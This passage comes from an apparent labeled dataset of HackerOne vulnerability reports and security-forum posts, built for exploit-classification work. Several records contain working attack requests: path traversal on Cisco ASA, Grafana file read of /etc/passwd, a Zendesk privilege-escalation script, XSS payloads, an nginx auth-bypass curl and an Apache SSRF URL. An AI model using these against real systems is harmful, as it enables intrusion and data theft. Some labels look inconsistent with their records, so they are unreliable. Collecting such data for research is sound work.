Summary:\n\nIf the HPB is used and a guest is removed from a conversation while said guest is in a call the guest will no longer appear in the participant list and the call will appear as ended for the other participants. However, for the guest the call UI is still shown. If other participants start a call the guest will automatically establish connections with them (so she will be able to hear and see the other participants), but from the point of view of the rest of the participants the guest is not in the call and she is not shown in their UI.\n\nThis can be reproduced only for guests and when the HPB is used. It could be related to https://github.com/nextcloud/spreed/issues/7962\n\n## Steps To Reproduce:\n\n- Setup the HPB\n- Create a public conversation\n- In a private window, open that public conversation as a guest\n- Start a call\n- In the original window, delete the guest\n- Start a call again\n\n### Expected result\n\nThe guest was kicked out from the call and she can not see nor hear the participants joining after that\n\n### Actual result\n\nThe guest was, according to the system messages for other participants, kicked out from the call, but the call UI is still shown for her and connections will be established to participants joining after that (and those new participants will not be aware of the guest being still in the call)\n\n## Impact\n\nAn attacker would be able to spy on calls in a public conversation after being removed from that conversation, provided that she was removed while being in the call.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4448e1fa95dfe8f307c0", "text": "[Improper Authentication - Generic] Full account takeover of any user through reset password\n\nHi Team\nI just checking this Url https://██████ and notice that when you request to forget password ,website send temp password in forget password request \nmy password in request is: ███\nPoc:\n```\nPOST /__852585b6003eba25.nsf/forgotpassword.html?OpenForm&Seq=1 HTTP/1.1\nHost: www.██████\nCookie: _ga=GA1.2.1700054986.1696324867; _ga_CSLL4ZEK4L=GS1.1.1696324866.1.1.1696324913.0.0.0; _ga_YQMQPQYJ4J=GS1.1.1696324867.1.1.1696324913.0.0.0\nContent-Length: 436\nCache-Control: max-age=0\nSec-Ch-Ua: \"Google Chrome\";v=\"117\", \"Not;A=Brand\";v=\"8\", \"Chromium\";v=\"117\"\nSec-Ch-Ua-Mobile: ?0\nSec-Ch-Ua-Platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nOrigin: https://www.██████\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nReferer: https://www.███████/852585B6003EBA25/forgotpassword.html\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9,fa;q=0.8\nConnection: close\n\n__Click=0&HTTP_HOST=www.██████████&HTTPS=ON&SERVER_NAME=www.████&%24DbPath=https%3A%2F%2Fwww.███████%2F852585B6003EBA25&████████&dbPath=https%3A%2F%2Fwww.█████%2F852585B6003EBA25&RepId=852585B6003EBA25&QUERY_STRING_DECODED=&eMailAddress=███.com&%25%25Surrogate_ChallengeQuestion=1&ChallengeQuestion=What+is+a+street+name+where+you+were+raised%3F&ChallengeAnswer=dez\n```\n\n## Impact\n\nFull account takeover of any user through reset password\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1-request for forget password\n2-capture request \n3- read password\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "344c9ef67d357b6796ca", "text": "[Cross-site Scripting (XSS) - Reflected] XSS on link and window.opener\n\nHi possible xss and error when clicking on the link .\n\n`
\n \n \n \n
\n`\n\nor \n\n`
\n \n \n \n
\n`\n\n## Impact\n\nRedirection from the original site to an evil site or execution of js code\n\nPlease check that the domain is `slack`\n\n{F765317}", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "55a573939493b9c29bc2", "text": "[Server-Side Request Forgery (SSRF)] CVE-2021-40438 on cp-eu2.acronis.com\n\nHi team\n\n## Summary\nCVE-2021-40438 on cp-eu2.acronis.com\n\n## Steps To Reproduce\n\n `\nhttps://cp-eu2.acronis.com?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2021-40438"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "637fc6698b4a9c38a4cd", "text": "Hi everyone, loving it so far One thing is troubling me, though. I solved “More Secrets” without solving “Secret Message” first… What did I do wrong? Are we dealing with the same files, or is this first challenge about something completely different, that I missed in my enum? Thanks a lot!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8bbeae0f23509b637325", "text": "[Path Traversal] Unathenticated file read (CVE-2020-3452)\n\n**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.\n\n\n## References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\nhttps://www.rapid7.com/blog/post/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/\n\n## Impact\n\nImpact\nAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\n1.) Perform the following GET request:\nGET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1\nHost: ██████\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F\nConnection: close\nAccept: */*\nAccept-Language: en\nAccept-Encoding: gzip, deflate, br\n\n2.) The response will contain contents of portal_inc.lua\n\n## Suggested Mitigation/Remediation Actions\nCisco has released software updates that address this vulnerability.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2020-3452"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4ac4814c82d8a274fc55", "text": "[Remote File Inclusion] Grafana LFI on https://grafana.mariadb.org\n\nHello team,\n\nThere is an LFI on `https://grafana.mariadb.org/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd`\n\n\n{F1537157}\n\n## Impact\n\nLFI", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d69e300142c74758e44b", "text": "[Phishing] Possible Domain Takeover on AWS Instance.\n\nThe vulnerable domain possibly available for takeover is:` traefik-livedemo.rocket.chat (CNAME: a0e7eaaaa82f611e9b1cc0e9ccd15f3e-557536140.us-west-2.elb.amazonaws.com)`.\nThis domain, contains a record pointing to these an WS instance. When querying for any IP under the instance, I got returned an NXDomain error.\n\nSteps to claim the instances:\nLog-in or register into AWS. (Region has to be set as us-west-2)\nGo onto the \"Elastic LoadBalancer\" section\nClick \"Create Loadbalancer\"\nClick \"Application Loadbalancer\"\nInput the name before the final dash and the numbers. (eg: a0e7eaaaa82f611e9b1cc0e9ccd15f3e )\nDeploy it, and check if the numbers are the same.\n\nIt might take a few to get the right one, but with an automated script I am certainly sure that it is achievable.\n\n## Impact\n\nThe attacker might be able to takeover the domain, and gain access to the domain. An user, recognizing the domain recalling \"rocket.chat\" would let the user trust the page, and then, give the attacker his credentials via a phishing form.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ff79e72c564bdcb0ffd7", "text": "I don’t really have a comprehensive list of TTPs for AD, however, I would recommend starting here: Techniques - Enterprise | MITRE ATT&CK® You can also check out the Windows matrice here: Matrix - Enterprise | MITRE ATT&CK®", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-03-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9f5d1c250d1e1b9fc944", "text": "if you run ‘apt list --installed’ first line of output is ‘Listing… Done’ so you need to exclude that line. To get the correct answer command should be ‘apt list --installed | grep “installed” | wc -l’ this will exclude the first line of the output.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-03-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ecb1c35f6fe74541d831", "text": "[Privilege Escalation] Privilege escalation - Support-Contributor to Support and Product Admin via `/api/v2/██████` . No ADMIN PRIVILEGE required.\n\nHello team, I am reporting another privilege escalation issue where a lowest privilege member(Support-Contributor) to full Support and Product administrator. Tested in Zendesk Enterprise(Sponsored) and Trial Account.\n\nFrom my past reports I was able to find privilege escalation issues on the endpoint `/api/███` . The difference is, to perform a privilege escalation on the said endpoint, there should be at least one Product Admin privilege on the actor's account but this report does not require any Admin privilege(just the lowest privilege alone).\n\n## Summary:\nThe [Contributor Role](https://support.zendesk.com/hc/en-us/articles/4408832171034-About-team-member-product-roles-and-access) is the lowest Support role in Zendesk. In the UI alone, as a contributor, the accessible pages and and endpoints are very limited. With this role, the members page is not even accessible or restricted. With these restrictions, escalating your own role seem to be impossible.\n\n##Improper Access Control to Privilege Escalation\nVulnerable Endpoint: `PUT /api███ HTTP/2`\n\nThe `/api████████` endpoint is used for API integration to █████. █████████ . However, the said endpoint does not validate the privilege of the user who is sending a request. With this bug, a member with even just the lowest privilege(Contributor) is able to escalate any members' privilege to `FULL ADMINISTRATOR` including its own privilege.\n\n## Browsers Verified In:\nLatest version of Chrome and Firefox\n\n##Exploit\n```javascript\n//Exploit\n//get csrf token and id\nvar xhttp = new XMLHttpRequest();\nxhttp.onreadystatechange = function() {\n if (this.readyState == 4 && this.status == 200) {\n var profile = JSON.parse(this.responseText);\n var csrf = profile.user.authenticity_token;\n\t\tvar id = profile.user.id;\n escalate(id, csrf);\n }\n};\n\nxhttp.open(\"GET\", \"https://\" + document.domain + \"/api/v2/users/me.json\");\nxhttp.send();\n\n\n//privilege escalation function\nfunction escalate(id, csrf) {\n var xhttp = new XMLHttpRequest();\n xhttp.onreadystatechange = function() {\n if (this.readyState == 4 && this.status == 200) {\n console.log(this.responseText);\n }\n };\n\n xhttp.open(\"PUT\", \"https://\" + document.domain + \"/api██████;\n xhttp.setRequestHeader(\"X-Csrf-Token\", csrf);\n xhttp.setRequestHeader(\"Content-Type\", \"application/json\");\n xhttp.send(JSON.stringify(███));\n}\n```\n\n## Steps To Reproduce:\n`On owner/admin account`\n1. Go to https://.zendesk.com/admin/people/team/members/new\n2. Provide the name and email of the agent\n3. Click Next\n4. Set the Support role to CONTRIBUTOR\n5. Go to https://.zendesk.com/admin/people/team/members\n6. Click the profile on the invited user\n7. Now set the roles to Support-Contributor only and `DISABLE` any product access(just to prove that no other privilege is required).\n\n`On invited user`\n8. You will receive an email. Click it to accept the invitation\n9. Login the invited account\n10. Execute the exploit to escalate your privileges.\n\n## Demo And PoC\nOn Enterprise account\n███\nOn Trial account\n███\n\n## Impact\n\nPrivilege escalation - Support-Contributor to Support and Product Admin.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8e223300f6587490c0a1", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS | https://████\n\nSummary\n\nHi team, there's a reflected XSS on https://█████████ using the `project` param. There's a WAF in place but it's possible to bypass it.\nSteps to reproduce\n\n1. Click https://████████/fcgi-bin/release.py?project=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE\n2. Observe the popup showing document.domain when right clicking \"RIGHT CLICK HERE\"\n\n███\n\n## Impact\n\nThe attacker can trigger remote code execution on the victim’s browser, and steal credentials, sessions, and potentially send malware to the victim.\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1. Click https://█████████/fcgi-bin/release.py?project=aaa%3Ch1%20onauxclick=confirm(document.domain)%3ERIGHT%20CLICK%20HERE\n2. Observe the popup showing document.domain when right clicking \"RIGHT CLICK HERE\"\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2ee009f79dd7095f75e4", "text": "[Cross-Site Request Forgery (CSRF)] [https://shipit-sox-staging.shopifycloud.com] Presence of multiple vulnerabilities present in Ruby On Rails\n\nhttps://shipit-sox-staging.shopifycloud.com seems to be running 6.0.0 < rails < 6.0.3.2 which is prone to multiple vulnerabilities via csrf including open redirect, xss & rce as reported at https://hackerone.com/reports/904059\n\n## Impact\n\npresence of multiple vulnerabilities can cause wide variety of damage.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a52066f5cf3a60599372", "text": "Which kernel version is installed on the system? (Format: 1.22.3) Which kernel version is installed on the system? (Format: 1.22.3) I nedd help", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3317ca1c65024bf1f1fb", "text": "[Improper Authentication - Generic] Attacker can bypass authentication build on ingress external auth (`nginx.ingress.kubernetes.io/auth-url`)\n\nReport Submission Form\n\n## Summary:\nSending request with `..%2F` allows to manipulate headers:\n\n* X-Original-Url\n* X-Auth-Request-Redirect\n\ndue to that manipulation external auth service could make wrong decision and return 204 instead of 401/403. **To be clear: manipulation of those headers give no possibility to kubernetes user to make any proper decisions based on those headers. ** This way allowing anonymous access to public service and trying to protect access to protected-service by e.g. api-key is not possible.\n\n{F1469913}\n\nExample:\nWith this call `curl -v http://app.test/public-service/..%2Fprotected-service/protected` external auth configured on ingress using `nginx.ingress.kubernetes.io/auth-url: http://auth-service.default.svc.cluster.local:8080/verify` will get following headers:\n```\nX-Request-Id: 7d979c82ca55141ed0d58655fbaac586\nHost: auth-service.default.svc.cluster.local\nX-Original-Url: http://app.test/public-service/..%2Fprotected-service/protected\nX-Original-Method: GET\nX-Sent-From: nginx-ingress-controller\nX-Real-Ip: 192.168.99.1\nX-Forwarded-For: 192.168.99.1\nX-Auth-Request-Redirect: /public-service/..%2Fprotected-service/protected\nConnection: close\nUser-Agent: curl/7.75.0\nAccept: */*\n```\nBoth headers `X-Original-Url` and `X-Auth-Request-Redirect` are manipulated. \n\nHow this auth-service can parse request? Here is simple example of python and Flask:\n```\napi_key = request.headers.get('X-Api-Key')\nrequest_redirect = request.headers.get('X-Auth-Request-Redirect')\n\nif request_redirect and request_redirect.startswith(\"/public-service/\"):\n return Response(status = HTTPStatus.NO_CONTENT)\n\nif api_key == \"secret-api-key\": \n return Response(status = HTTPStatus.NO_CONTENT)\n\nreturn Response(status = HTTPStatus.UNAUTHORIZED)\n```\n\n## Kubernetes Version:\nminikube v1.23.2 on Microsoft Windows 10 Pro 10.0.19043 Build 19043\nKubernetesa v1.22.2 on Docker 20.10.8\n\n## Component Version:\nk8s.gcr.io/ingress-nginx/controller:v1.0.0-beta.3@sha256:44a7a06b71187a4529b0a9edee5cc22bdf71b414470eff696c3869ea8d90a695\n\n## Steps To Reproduce:\n\n 1. Download project in attachment: F1469916\n 2. Install minikube\n 3. Enable addon ingress and ingress-dns\n 4. Build docker images:\n\n * `cd auth-service; docker build -t auth-service:0.0.4 .`\n * `cd protected-service; docker build -t protected-service:0.0.1 .`\n * `cd public-service; docker build -t public-service:0.0.1 .`\n\n 5. push docker images into minikube:\n\n * `minikube image load auth-service:0.0.4`\n * `minikube image load protected-service:0.0.1`\n * `minikube image load public-service:0.0.1`\n\n 6. apply kubernetes configuration: `kubectl apply -f app.yaml`\n\nTo access public service: `curl -v http://app.test/public-service/public`\nTo access protected service: `curl -v http://app.test/protected-service/protected -H \"X-Api-Key: secret-api-key\"`\nTo access protected service bypassing authentication: `curl -v http://app.test/public-service/..%2Fprotected-service/protected`\n\n## Supporting Material/References:\n\n * in F1469916 - project consist of 2 services: public and protected. Access to public should be available for anyone and to protected only with `X-Api-Key` header. auth-service is protecting access and configured as external auth on ingress.\n * app.yaml - whole configuration\n * auth-service, protected-service, public-service - directories with Dockerfiles to build\n\n## Additional note\nAt first I have found this vulnerability in old version of ingress-nginx. It was 0.70.0. With this old version bypass was working without encoding of / to %2F.\ne.g. `curl -v http://app.test/public-service/../protected-service/protected`\nI was not able to reproduce it locally with minikube (couldn't install old ingress addon), but there is possibility that for some older versions of ingress-nginx you don't need to encode / to %2F.\n\n## Impact\n\nAttacker can bypass authentication build on ingress externa", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "aecc31f9af8d5ffd2e2c", "text": "[Business Logic Errors] Verification process done using different documents without corresponding to user information / User information can be changed after verification\n\n## Summary:\n\n1. A verified user can change their profile information (Name, DoB and Address) after identity verification using the API endpoint /kyc_back/api/v2/surveys/personal_info \n2. A user can verifiy their account with ofical documents that does not correspond to their Name and Address information provided in verification process\n\n*** Note -*** *my.exness.com does not allow to change profile information (Name, DoB, Address) using website or mobile app. The only point where a user can set name, address and dob is when verifying the account but after that, there is no way for the user an option to change such that information in the GUI.*\n\n## Affected enpoints:\n - wbesite and mobile apps\n\n## Steps to Reproduce:\n\n***NOTE -*** The following steps covers the two issues found, changing info after verification and with documents that does not correspond to the user\n\n 1. Open BurpSuite CE, turn off the Proxy feature in order just to log each request made by the browser.\n 2. Configure your browser with BurpSuite CE proxy settings\n 3. Create an account for a real account (not a demo account), you can use a properly email provider or a dispoable one too\n 4. Go to https://my.exness.com/pa/settings/profile\n 5. At the top of the window, there is a button that helps to go to the process to verify the account\n 6. Verify the current verification step with the code sent to the email used\n 7. Verify the current verification step with the code sent to the phone number used\n 7. Add any name, address and dob, click next\n 7. Continue with the verification process... \n 8. Select ID card, add your documents (it could be a oficial ID card that does not correspond to you)\n 9. You will asked to upload a document to proof your address, add it (you can add an oficial proof of address that is related to the previous document to comply names and address)\n 10. Submit your document and wait until they are verified (Do not let the session expires, continue click on the website normally)\n 11. Go to BurpSuite CE Proxy > HTTP hisotry tab > searcch for the following request and send it to Repeater: \n```\nPATCH /kyc_back/api/v2/surveys/personal_info\nHost: my.exness.com\n```\n 12. Refresh your page after some time, like 15-30 minutes more or less. \n 13. The identity verification was completed\n 14. Go to Burp Suite CE Repeater tab, scroll down and change the request body json data to the following:\n\n```\n{\"first_name\":\"test-1\",\"last_name\":\"test-2\",\"test-3\":\"\",\"dob\":\"1990-01-01\",\"address\":\"test-4\"}\n```\n\n 15. Send the request, you will get a HTTP 200 response with the following body: ***{\"status\":\"OK\"}***\n 17. The information was changed, you can check it out by browsing https://my.exness.com/pa/settings/profile or https://my.exnesstrade.pro/settings/personalInfo\n\nInformation when verification was completed\n\n{F1574748}\n\nInformation when verification was completed displayed in my.exness.pro\n{F1574749}\n\nInformation changed after verification\n\n{F1574752}\n\n\nInformation changed after verification and displayed in my.exness.pro\n\n{F1574751}\n\n\n## Impact\nAn attacker can use exness.com platform to start trading under someone's information and verify their account with oficial documents that does not corresponds to them. The business logic flaw in the platform makes it a not good-trusting site for any user being part of the platform or not due to it is possible to use someone's documents.\n\n## Mitigation\nAdd photo to the profile and then, facial recognition to match the photo on the ID with the person presenting the card\nAddress recognition to match the address on the proof of address document presented\n\n\n## Supporting Material/References:\nhttps://cheatsheetseries.owasp.org/cheatsheets/Multifactor_Authentication_Cheat_Sheet.html\n\n## Impact\n\nAn attacker can use exness.com platform to start trading under someone's information and verify their account with oficial documents that does no", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "27b5b8d3858018087287", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS at https://██████/██████ via \"██████\" parameter\n\nThere is Reflected Cross site scripting issue at the following url:\n\nhttps://██████████/██████\n\nProof Of Concept\n\nhttps://████████/█████████████████=%22%3E%3Csvg/onload=alert(1)%3E████████��\n\n█████\n\nBest Regards\n\n@pelegn\n\n## Impact\n\nCookies Exfiltration\nSOAP Bypass\nCORS Bypass\nExecuting javascript on the victim behalf\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE 